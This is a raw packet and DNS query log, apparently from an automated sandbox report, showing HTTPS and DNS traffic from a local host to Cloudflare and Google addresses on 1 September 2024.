Sep 1, 2024 06:29:17.273565054 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.274333954 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.274343967 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.274513006 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.275233030 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.275866032 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.276004076 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.369537115 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.402041912 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:21.351463079 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:21.351600885 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:21.352159977 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:21.352267981 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:21.818149090 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:21.819139004 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:21.857418060 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.194087029 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.194154024 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.194164038 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.194196939 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.194623947 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.194703102 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.195005894 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.195375919 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.288341999 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.291095972 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.291987896 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.292325020 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.292524099 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.294040918 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.294204950 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.294434071 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.326260090 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.758472919 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.758490086 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.758562088 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.759144068 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.759155035 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.759155035 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.759962082 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.862176895 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.862190962 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.863643885 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.881134987 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.881284952 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.881294012 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:22.881762028 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:22.918591022 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:23.156318903 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:24.357970953 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:24.483836889 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:24.511996984 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:24.522531986 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:24.522542953 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:24.522552013 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:24.522857904 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:24.523010969 CEST	55725	443	192.168.2.5	142.251.111.84
Sep 1, 2024 06:29:24.649050951 CEST	443	55725	142.251.111.84	192.168.2.5
Sep 1, 2024 06:29:25.827763081 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:25.828145981 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:26.233213902 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:26.234247923 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:26.235090017 CEST	443	61605	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:26.235287905 CEST	61605	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:26.235940933 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.236130953 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.574718952 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.688899994 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.695836067 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.695966005 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.696443081 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.696543932 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.696966887 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.696985960 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.697156906 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.714082003 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.789942980 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.791625023 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.791769981 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.791822910 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.792314053 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.806025982 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.806375027 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.806926966 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.807082891 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.808087111 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:26.841245890 CEST	54137	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:26.901717901 CEST	443	54137	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.108781099 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.109004021 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.513740063 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.584630013 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.584717035 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.586350918 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.586350918 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.586781979 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.586781979 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.586781979 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.603416920 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.614331007 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.621737957 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.684614897 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.685493946 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.685502052 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.685636997 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.685739994 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.685952902 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.701273918 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.701430082 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.701438904 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.701683044 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.702419043 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.702445030 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.703351021 CEST	65204	443	192.168.2.5	142.250.65.174
Sep 1, 2024 06:29:57.719410896 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.799587965 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:29:57.825901985 CEST	443	65204	142.250.65.174	192.168.2.5
Sep 1, 2024 06:30:27.297419071 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.297610998 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.298311949 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.298311949 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.745969057 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:27.752971888 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.780951977 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.851537943 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:27.851548910 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:27.851557016 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:27.851670027 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:27.851946115 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.852051020 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:27.948091984 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:27.948415041 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:28.049323082 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:28.049465895 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:28.050074100 CEST	443	55926	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:28.050213099 CEST	55926	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:28.051063061 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.051259041 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.523319006 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.523542881 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.523869038 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.524005890 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.524497986 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.524564981 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.524848938 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.524868965 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.541816950 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.623095989 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.624955893 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.625094891 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.625104904 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.626010895 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.638597012 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.638788939 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:30:28.639187098 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.639446020 CEST	51561	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:30:28.738645077 CEST	443	51561	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.107557058 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.107793093 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.587810040 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.587934971 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.588460922 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.588627100 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.588911057 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.588943958 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.606328964 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.682732105 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.683995008 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.684036016 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.684236050 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.697521925 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.697784901 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:00.697812080 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.731491089 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:00.819526911 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:01.754560947 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:01.754622936 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:01.851994038 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:01.862633944 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:01.862889051 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:01.863136053 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:01.902089119 CEST	50238	443	192.168.2.5	142.250.80.110
Sep 1, 2024 06:31:01.982364893 CEST	443	50238	142.250.80.110	192.168.2.5
Sep 1, 2024 06:31:16.732522011 CEST	65237	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:31:16.732554913 CEST	55408	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:31:17.096771955 CEST	53	55408	1.1.1.1	192.168.2.5
Sep 1, 2024 06:31:17.097738981 CEST	53	65237	1.1.1.1	192.168.2.5
Sep 1, 2024 06:31:17.099306107 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.099591970 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.099591970 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.099766016 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.496860981 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.548949003 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.551331043 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.594383955 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.746644020 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.746644020 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.747046947 CEST	51652	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:31:17.747046947 CEST	62379	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:31:17.747169018 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.747256994 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.819083929 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.820986032 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.820993900 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.821001053 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.821007967 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.821333885 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.821333885 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.857837915 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.912126064 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.912550926 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:17.919060946 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:17.949904919 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:18.010627031 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:19.100342035 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:19.100342035 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:19.196099997 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:19.196755886 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:19.196924925 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:19.230850935 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:19.975579023 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:19.975745916 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:20.074475050 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:20.076657057 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:20.076890945 CEST	443	51051	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:20.077312946 CEST	51051	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.377952099 CEST	60106	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:31:21.378846884 CEST	58940	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:31:21.388045073 CEST	53	60106	1.1.1.1	192.168.2.5
Sep 1, 2024 06:31:21.388365030 CEST	53	58940	1.1.1.1	192.168.2.5
Sep 1, 2024 06:31:21.398308039 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.398308039 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.398936033 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.399233103 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.864809036 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:21.867013931 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.894840956 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.962775946 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:21.962786913 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:21.962794065 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:21.962804079 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:21.963257074 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:21.963275909 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:22.064091921 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:22.064313889 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:22.159998894 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:22.160546064 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:22.160810947 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:22.161479950 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:22.162286997 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.162492037 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.162739992 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.623959064 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.624478102 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.624615908 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.624624968 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.624702930 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.624742031 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.624831915 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.625026941 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.661374092 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.661411047 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.661417961 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.661654949 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.661812067 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:22.723459959 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.761606932 CEST	443	65280	142.251.167.84	192.168.2.5
Sep 1, 2024 06:31:22.761820078 CEST	65280	443	192.168.2.5	142.251.167.84
Sep 1, 2024 06:31:32.444858074 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:32.445014954 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:32.540085077 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:32.540986061 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:32.548896074 CEST	443	58701	162.159.61.3	192.168.2.5
Sep 1, 2024 06:31:32.549432993 CEST	58701	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:31:32.550499916 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:32.550715923 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.024868965 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.025969982 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.029449940 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.029449940 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.032856941 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.032856941 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.040352106 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.131103992 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.135276079 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.135611057 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.136538982 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.149286985 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.149523020 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.149822950 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.184912920 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.248914957 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.248914957 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.273957968 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.347151995 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.360805035 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.361041069 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.372934103 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.496750116 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.528310061 CEST	443	60118	142.251.35.174	192.168.2.5
Sep 1, 2024 06:31:33.604639053 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:33.604639053 CEST	60118	443	192.168.2.5	142.251.35.174
Sep 1, 2024 06:31:40.943310022 CEST	138	138	192.168.2.5	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2024 06:28:16.710856915 CEST	192.168.2.5	1.1.1.1	0xc297	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:16.710978031 CEST	192.168.2.5	1.1.1.1	0x444c	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Sep 1, 2024 06:28:19.905920982 CEST	192.168.2.5	1.1.1.1	0x844	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.905920982 CEST	192.168.2.5	1.1.1.1	0xa5e6	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 1, 2024 06:28:19.906857014 CEST	192.168.2.5	1.1.1.1	0xb23e	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.906857014 CEST	192.168.2.5	1.1.1.1	0x4b97	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 1, 2024 06:28:19.907401085 CEST	192.168.2.5	1.1.1.1	0xc874	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.908147097 CEST	192.168.2.5	1.1.1.1	0x19d9	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 1, 2024 06:28:19.908147097 CEST	192.168.2.5	1.1.1.1	0xf4e0	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:19.908402920 CEST	192.168.2.5	1.1.1.1	0xcb61	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 1, 2024 06:28:20.065859079 CEST	192.168.2.5	1.1.1.1	0x1b1f	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:28:20.065859079 CEST	192.168.2.5	1.1.1.1	0x82b3	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 1, 2024 06:31:16.732522011 CEST	192.168.2.5	1.1.1.1	0x2384	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 06:31:16.732554913 CEST	192.168.2.5	1.1.1.1	0xb729	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Sep 1, 2024 06:31:17.747046947 CEST	192.168.2.5	1.1.1.1	0x99d8	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
